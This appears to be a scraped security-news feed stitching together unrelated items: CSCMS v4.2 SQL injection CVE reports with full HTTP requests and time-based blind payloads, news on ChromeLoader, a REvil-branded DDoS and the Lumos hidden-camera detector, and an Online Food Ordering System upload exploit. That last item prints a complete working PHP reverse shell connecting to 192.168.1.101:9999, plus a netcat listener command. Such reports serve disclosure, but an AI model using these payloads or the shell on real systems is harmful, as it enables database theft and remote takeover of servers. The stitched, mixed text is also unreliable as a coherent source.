CSCMS Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the id parameter at /admin.php/pic/admin/lists/zhuan.

    POST /admin.php/pic/admin/lists/zhuan HTTP/1.1
    Host: cscms.test
    Content-Length: 21
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/pic/admin/type?yid=3
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=n7gacaf0cfrdgd78692oaa4f2li036fp;XDEBUG_SESSION=PHPSTORM
    Connection: close
    
    id[]=(sleep(5))&cid=5
    

(case(1)when(ascii(substr((select(database()))from(1)for(1)))=99)then(sleep(5))else(1)end)

Because the first letter of the background database name is "c", it sleeps for 5 seconds,so the vulnerablity exisit

CVE-2022-29666: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #24 · chshcms/cscms

CSCMS Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via /admin.php/pic/admin/pic/hy. This vulnerability is exploited via restoring deleted photos.

**Details**

there is a Injection vulnerability exists in pic\_Pic.php\_hy

Injection occurs when restoring deleted photos from the trash

    GET /admin.php/pic/admin/pic/hy?id=3)and(sleep(5))--+ HTTP/1.1
    Host: cscms.test
    Accept: application/json, text/javascript, */*; q=0.01
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    X-Requested-With: XMLHttpRequest
    Referer: http://cscms.test/admin.php/pic/admin/pic?yid=3
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=o58jedqf4p0pobv4atdiuae0n6015865
    Connection: close
    

Discovery success makes the server sleep,Construct payload,Then construct payload to blast database

Because the first letter of the background database name is "c", it sleeps for 5 seconds,so the vulnerablity exisit

CVE-2022-29667: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #26 · chshcms/cscms

CSCMS Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the id parameter at /admin.php/Links/del.

**Details**

there is a Injection vulnerability exists in sys\_Links.php\_del

After logging in, the administrator needs to add a friendship link first. SQL injection vulnerability occurs when deleting the friendship link. The constructed malicious payload is as follows

    POST /admin.php/Links/del HTTP/1.1
    Host: cscms.test
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://cscms.test/admin.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_session=3lvkrqraebntvbg76ecdifg0j6vl1bpl; cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA;XDEBUG_SESSION=PHPSTORM
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 15
    
    id[]=(sleep(5))
    

You can see that success makes the server sleep  
Construct payload to guess the database

(case(1)when(ascii(substr((select(database()))from(1)for(1)))=99)then(sleep(5))else(1)end)

There is blind SQL injection. Because the database name is "cscms", the string returned by select database() starts with 'C', substr ((select + database()), 1,1) = 'C' is true, and the verification is correct

CVE-2022-29681: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #35 · chshcms/cscms

CSCMS Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the id parameter at /admin.php/user/level_del.

The administrator needs to add a member after logging in. SQL injection vulnerability is generated when deleting the member. The constructed malicious payload is as follows

    POST /admin.php/user/level_del HTTP/1.1
    Host: cscms.test
    Content-Length: 15
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/user/level?v=2012
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=6g124miit249dnkv508bnrsshc8ugiss;XDEBUG_SESSION=PHPSTORM
    Connection: close
    
    id[]=(sleep(5))
    

You can see that success makes the server sleep  
Construct payload to guess the database

(case(1)when(ascii(substr((select(database()))from(1)for(1)))=99)then(sleep(5))else(1)end)

There is blind SQL injection. Because the database name is "cscms", the string returned by select database() starts with 'C', substr ((select + database()), 1,1) = 'C' is true, and the verification is correct

CVE-2022-29687: SQL injection vulnerability exists in Cscms music portal system v4.2 （Discovered by 星海Lab） · Issue #30 · chshcms/cscms

ChromeLoader is working its way into Chrome browsers via ISO images claiming to offer cracked games. What are the dangers?
The post ChromeLoader targets Chrome Browser users with malicious ISO files appeared first on Malwarebytes Labs.

If you’re on the hunt for cracked software or games, be warned. Rogue ISO archive files are looking to infect your systems with ChromeLoader. If you think campaigns such as this only target Windows users, you’d sadly be very much mistaken. The attack sucks in several operating systems and even uses mobiles as bait to draw in additional victims.

**Of PowerShells and ISOs**

An optimal disc image (ISO) is a disk image containing everything written to an optical disc. If someone copied a DVD or CD-ROM, they may end up with an ISO. With the right software, these files can be mounted and read as if the device was reading from a physical disc.

If a malware author claims to be offering cracked or pirated versions of games or software, an ISO is frequently what’s on offer. They may be promoted on social media, video sites, game crack portals, or torrents. Sadly for would-be file downloaders, they’re frequently booby trapped with malware.

PowerShell is a way to automate tasks and comes complete with  a command line interface. It can be used by infection files to execute specific commands and get the infection ball rolling. This ChromeLoader attack combines both Powershell and ISOs to compromise systems.

**How does ChromeLoader infect a device?**

The flow is as follows:

1.  Bogus files are promoted on Twitter and other services. Some victims are simply grabbing the infection from rogue sites and/or torrents.
2.  Some social media posts promote supposedly cracked Android games via QR codes which direct would-be gamers to rogue websites.
3.  Double clicking the ISO file mounts it as a virtual CD-ROM. The executable in the ISO claims to be the content the victim was originally looking for.
4.  ChromeLoader makes use of a PowerShell command to load in a Chrome extension from a remote resource. PowerShell then removes the scheduled task and the victim is none the wiser that their browser has been compromised. At this point, search results cannot be trusted and bogus entries will be displayed to the user.
5.  As BleepingComputer notes, users of macOS are also at risk from this attack. Instead of ISO, attackers use DMG (Apple Disk Image) files, which is a more common format on that OS.

**Tips to avoid ChromeLoader**

1.  Searching for cracked games and software is a very risky business. Many sites promoting malware masquerading as “genuine” crack portals are hard to spot. If you’re downloading a torrent, you may well be rolling dice with regard to the digital health of your devices. Deep sales on games and products are fairly common. Unless it’s a brand new title, it may be worth waiting for a product-centric sale.
2.  In Chrome, Click the **More** icon, then **More Tools** -> **Extensions**. From there, you can see what’s installed, what is active or disabled, along with additional information about all extensions present. Google also has advice for resetting browser settings and additional clean-up methods.
3.  Keeping your security software up to date and running regular scans helps prevent this kind of attack. You should also always scan a downloaded file before making use of it.
4.  Keep in mind that rogue extensions don’t just come from bad websites or rogue downloads. The Chrome web store itself has been known to play host to bad files. Always check reviews, developer information, extension permissions and anything else of note before installing a new extension to your browser.

ChromeLoader targets Chrome Browser users with malicious ISO files

Actors claiming to be the defunct ransomware group are targeting one of Akami’s customers with a Layer 7 attack, demanding an extortion payment in Bitcoin.

Actors claiming to be the defunct ransomware group are targeting one of Akami’s customers with a Layer 7 attack, demanding an extortion payment in Bitcoin.

The defunct REvil ransomware gang is claiming responsibility for a recent distributed denial of service (DDoS) campaign against a hospitality customer of cloud networking provider Akamai. However, it’s highly possible the attack is not a resurgence of the infamous cybercriminal group but a copycat operations, researchers said.

Akamai researchers have been monitoring the DDoS attack since May 12, when a customer an alerted the company’s Security Incident Response Team (SIRT) of an attempted attack by a group claiming to be associated with REvil, Akamai revealed in a blog post Wednesday.

“The attacks so far target a site by sending a wave of HTTP/2 GET requests with some cache-busting techniques to overwhelm the website,” Akamai SIRT vulnerability researcher Larry Cashdollar wrote in the post. “The requests contain embedded demands for payment, a bitcoin (BTC) wallet, and business/political demands.”

However, while the attackers claim to be REvil, it’s unclear at this time if the defunct ransomware group is responsible, as the attempts seem smaller than previous similar campaigns for which the group claimed responsibility, researchers said.

There also appears to be a political motivation behind the DDoS campaign, which is inconsistent with REvil’s previous tactics, in which the group claimed it was motivated solely by financial gain.

****Return of REvil?****

REvil, which went dark in July 2021, was a Russia-based ransomware-as-a-service (RaaS) group well-known for its high-profile attacks against Kaseya, JBS Foods and Apple Computer, among others. The disruptive nature of its attacks spurred international authorities to go hard against the group, with Europol arresting a number of the gang’s affiliates in November 2021.

Finally, in March 2022, Russia—which until then had done little to thwart REvil’s operation–claimed responsibility for fully dismantling the group at the request of the U.S. government, apprehending its individual members. One of those arrested at the time was instrumental in helping ransomware group DarkSide in a crippling attack in May 2021 against Colonial Pipeline, which resulted in the company paying $5 million in ransom.

The recent DDoS attack—which would be a pivot for REvil—was comprised of a simple HTTP GET request in which the request path contained a message to the target containing a 554-byte message demanding payment, researchers said. Traffic in the attack on Layer 7 of the network—the human-computer interaction layer in which apps access network services–peaked at 15 kRps.

The victim was directed to send the BTC payment to a wallet address that “currently has no history and is not tied to any previously known BTC,” Cashdollar wrote.

The attack also had an additional geospecific demand that requested the targeted company to cease business operations across an entire country, he said. Specifically, attackers threatened to launch to follow-up attack that would affect global business operations if this demand was not met and the ransom was not paid in a specific timeframe.

****Potential Copycat Attack****

There is a precedent for REvil using DDoS in its pervious tactics as a means of triple extortion. However, aside from that, the attack does not appear to be the work of the ransomware group unless it’s the start of an entirely new operation, Cashdollar noted.

REvil’s typical modus operandi was to gain access to a target network or organization and encrypt or steal sensitive data, demanding payment to decrypt or prevent information leakage to the highest bidders or threatening public disclosure of sensitive or damaging information, he said.

The technique seen in the DDoS attack “strays from their normal tactics,” Cashdollar wrote. “The REvil gang is a RaaS provider, and there is no presence of ransomware in this incident,” he wrote.

The political motivation tied to the attack—which is linked to a legal ruling about the targeted company’s business model–also goes against a claim REvil’s leaders have made in the past that they are purely profit-driven. “We haven’t seen REvil linked to political campaigns in any other previously reported attacks,” Cashdollar observed.

However, it is possible that REvil is seeking a resurgence by dipping its toe in a new business model of DDoS extortion, he said. What’s more likely is that attackers in the campaign are merely using the name of a notorious cybercriminal group to frighten the targeted organization into meeting their demands, Cashdollar said.

“What better way to scare your victim into payment than leveraging the name of a notable group that strikes fear into the hearts of organizations’ executives and security teams across wide swaths of industry,” he wrote.

Cybergang Claims REvil is Back, Executes DDoS Attacks

During the protests in Hong Kong, young people carried laser pointers, umbrellas, and plastic ties—objects that sometimes led to their arrest, and years of legal limbo.

‘How Are They Weapons? That’s Only a Flashlight!’

A group of academics has devised a system that can be used on a phone or a laptop to identify and locate Wi-Fi-connected hidden IoT devices in unfamiliar physical spaces.
With hidden cameras being increasingly used to snoop on individuals in hotel rooms and Airbnbs, the goal is to be able to pinpoint such rogue devices without much of a hassle.
The system, dubbed Lumos, is designed with this

A group of academics has devised a system that can be used on a phone or a laptop to identify and locate Wi-Fi-connected hidden IoT devices in unfamiliar physical spaces.

With hidden cameras being increasingly used to snoop on individuals in hotel rooms and Airbnbs, the goal is to be able to pinpoint such rogue devices without much of a hassle.

The system, dubbed **Lumos**, is designed with this intent in mind and to "visualize their presence using an augmented reality interface," said Rahul Anand Sharma, Elahe Soltanaghaei, Anthony Rowe, and Vyas Sekar of Carnegie Mellon University in a new paper.

At its core, the platform works by snuffing and collecting encrypted wireless packets over the air to detect and identify concealed devices. Subsequently, it estimates the location of each identified device with respect to the user as they walk around the perimeter of the space.

The localization module, for its part, combines signal strength measurements that are available in 802.11 packets (aka Received Signal Strength Indicator or RSSI) with relative user position determined by visual inertial odometry (VIO) information on mobile phones.

On Apple's iOS devices, for instance, the positional tracking is achieved by means of ARKit, a developer API that makes it possible to build augmented reality experiences by taking advantage of the phone's camera, CPU, GPU, and motion sensors.

"As the user walks closer to each device, the RSSI values corresponding to those data points increase and then reduce as she walks away from the device," the researchers said. "Lumos leverages the spatial measurements of RSSI values and their variations to estimate the location of each device."

What's more, Lumos can localize IoT devices irrespective of the user's walking speed. Also incorporated is a fingerprinting module that analyzes the captured 802.11 traffic patterns using a machine learning model to identify the devices based on the MAC addresses.

The research evaluated Lumos across 44 different IoT devices spanning various types, models, and brands across six different environments, finding that it can identify hidden devices with 95% accuracy and locate them with a median error of 1.5m within 30 minutes in a two-bedroom, 1000 sq.ft. apartment.

That said, an advanced attacker can leverage techniques like MAC address randomization to evade detection and sidestep localization by arbitrarily modifying the devices' transmit power.

"Lumos can potentially generalize across different device brands and models, as long as it has seen at least one device with similar behavior in the training phase," the researchers said, pointing to how the system can even identify unprofiled devices.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Lumos System Can Find Hidden Cameras and IoT Devices in Your Airbnb or Hotel Room

An arbitrary file upload vulnerability in the Select Image function of Online Food Ordering System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.

\# Online Food Ordering System Unrestricted File Upload + Remote Code Execution \* Exploit Date: 4/18/2022 \* Exploit Author: Nguyen Phu Hung (d4rkp0w4r) # Exploit \* Step => Login to admin -> \`Categoty\` -> \`Add Categoty\` -> \`Upload malicious file\` \* Injection Point => \`Select Image\` !\[\](https://i.imgur.com/LHML1T2.png) \* Use netcat listen web shell \`\`\`python= nc.exe -vv -l -p 9999 \`\`\` \* Log out admin page or stayed, web shell direct connected !!! !\[\](https://i.imgur.com/Kkz3kQc.png) # POC \* Request \`\`\`python= POST /online-food-order/admin/add-category.php HTTP/1.1 Host: 192.168.1.101:8888 Content-Length: 9853 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.101:8888 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydqHz7jzGYIN0VWy4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.1.101:8888/online-food-order/admin/add-category.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: \_lang=en; PHPSESSID=hpgbm1opdd0qcqb5f73jvpr4ia Connection: close ------WebKitFormBoundarydqHz7jzGYIN0VWy4 Content-Disposition: form-data; name="title" Hacked ------WebKitFormBoundarydqHz7jzGYIN0VWy4 Content-Disposition: form-data; name="image"; filename="nc.php" Content-Type: application/octet-stream <?php class Shell { private $addr = null; private $port = null; private $os = null; private $shell = null; private $descriptorspec = array( 0 => array('pipe', 'r'), // shell can read from STDIN 1 => array('pipe', 'w'), // shell can write to STDOUT 2 => array('pipe', 'w') // shell can write to STDERR ); private $buffer = 1024; // read/write buffer size private $clen = 0; // command length private $error = false; // stream read/write error public function \_\_construct($addr, $port) { $this->addr = $addr; $this->port = $port; } private function detect() { $detected = true; if (stripos(PHP\_OS, 'LINUX') !== false) { // same for macOS $this->os = 'LINUX'; $this->shell = '/bin/sh'; } else if (stripos(PHP\_OS, 'WIN32') !== false || stripos(PHP\_OS, 'WINNT') !== false || stripos(PHP\_OS, 'WINDOWS') !== false) { $this->os = 'WINDOWS'; $this->shell = 'cmd.exe'; } else { $detected = false; echo "SYS\_ERROR: Underlying operating system is not supported, script will now exit...\\n"; } return $detected; } private function daemonize() { $exit = false; if (!function\_exists('pcntl\_fork')) { echo "DAEMONIZE: pcntl\_fork() does not exists, moving on...\\n"; } else if (($pid = @pcntl\_fork()) < 0) { echo "DAEMONIZE: Cannot fork off the parent process, moving on...\\n"; } else if ($pid > 0) { $exit = true; echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\\n"; } else if (posix\_setsid() < 0) { // once daemonized you will actually no longer see the script's dump echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\\n"; } else { echo "DAEMONIZE: Completed successfully!\\n"; } return $exit; } private function settings() { @error\_reporting(0); @set\_time\_limit(0); // do not impose the script execution time limit @umask(0); // set the file/directory permissions - 666 for files and 777 for directories } private function dump($data) { $data = str\_replace('<', '&lt;', $data); $data = str\_replace('>', '&gt;', $data); echo $data; } private function read($stream, $name, $buffer) { if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream $this->error = true; // set global error flag echo "STRM\_ERROR: Cannot read from ${name}, script will now exit...\\n"; } return $data; } private function write($stream, $name, $data) { if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream $this->error = true; // set global error flag echo "STRM\_ERROR: Cannot write to ${name}, script will now exit...\\n"; } return $bytes; } // read/write method for non-blocking streams private function rw($input, $output, $iname, $oname) { while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) { if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length $this->dump($data); // script's dump } } // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS) // we must read the exact byte length from a stream and not a single byte more private function brw($input, $output, $iname, $oname) { $fstat = fstat($input); $size = $fstat\['size'\]; if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) { // for some reason Windows OS pipes STDIN into STDOUT // we do not like that // we need to discard the data from the stream while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) { $this->clen -= $bytes; $size -= $bytes; } } while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) { $size -= $bytes; $this->dump($data); // script's dump } } public function run() { if ($this->detect() && !$this->daemonize()) { $this->settings(); // ----- SOCKET BEGIN ----- $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30); if (!$socket) { echo "SOC\_ERROR: {$errno}: {$errstr}\\n"; } else { stream\_set\_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS // ----- SHELL BEGIN ----- $process = @proc\_open($this->shell, $this->descriptorspec, $pipes, null, null); if (!$process) { echo "PROC\_ERROR: Cannot start the shell\\n"; } else { foreach ($pipes as $pipe) { stream\_set\_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS } // ----- WORK BEGIN ----- $status = proc\_get\_status($process); @fwrite($socket, "SOCKET: Shell has connected! PID: " . $status\['pid'\] . "\\n"); do { $status = proc\_get\_status($process); if (feof($socket)) { // check for end-of-file on SOCKET echo "SOC\_ERROR: Shell connection has been terminated\\n"; break; } else if (feof($pipes\[1\]) || !$status\['running'\]) { // check for end-of-file on STDOUT or if process is still running echo "PROC\_ERROR: Shell process has been terminated\\n"; break; // feof() does not work with blocking streams } // use proc\_get\_status() instead $streams = array( 'read' => array($socket, $pipes\[1\], $pipes\[2\]), // SOCKET | STDOUT | STDERR 'write' => null, 'except' => null ); $num\_changed\_streams = @stream\_select($streams\['read'\], $streams\['write'\], $streams\['except'\], 0); // wait for stream changes | will not wait on Windows OS if ($num\_changed\_streams === false) { echo "STRM\_ERROR: stream\_select() failed\\n"; break; } else if ($num\_changed\_streams > 0) { if ($this->os === 'LINUX') { if (in\_array($socket , $streams\['read'\])) { $this->rw($socket , $pipes\[0\], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN if (in\_array($pipes\[2\], $streams\['read'\])) { $this->rw($pipes\[2\], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET if (in\_array($pipes\[1\], $streams\['read'\])) { $this->rw($pipes\[1\], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET } else if ($this->os === 'WINDOWS') { // order is important if (in\_array($socket, $streams\['read'\])/\*------\*/) { $this->rw ($socket , $pipes\[0\], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN if (($fstat = fstat($pipes\[2\])) && $fstat\['size'\]) { $this->brw($pipes\[2\], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET if (($fstat = fstat($pipes\[1\])) && $fstat\['size'\]) { $this->brw($pipes\[1\], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET } } } while (!$this->error); // ------ WORK END ------ foreach ($pipes as $pipe) { fclose($pipe); } proc\_close($process); } // ------ SHELL END ------ fclose($socket); } // ------ SOCKET END ------ } } } echo '<pre>'; // change the host address and/or port number as necessary $sh = new Shell('192.168.1.101', 9999); $sh->run(); unset($sh); // garbage collector requires PHP v5.3.0 or greater // @gc\_collect\_cycles(); echo '</pre>'; ?> ------WebKitFormBoundarydqHz7jzGYIN0VWy4 Content-Disposition: form-data; name="featured" Yes ------WebKitFormBoundarydqHz7jzGYIN0VWy4 Content-Disposition: form-data; name="active" Yes ------WebKitFormBoundarydqHz7jzGYIN0VWy4 Content-Disposition: form-data; name="submit" Add Category ------WebKitFormBoundarydqHz7jzGYIN0VWy4-- \`\`\`

Tag

#apple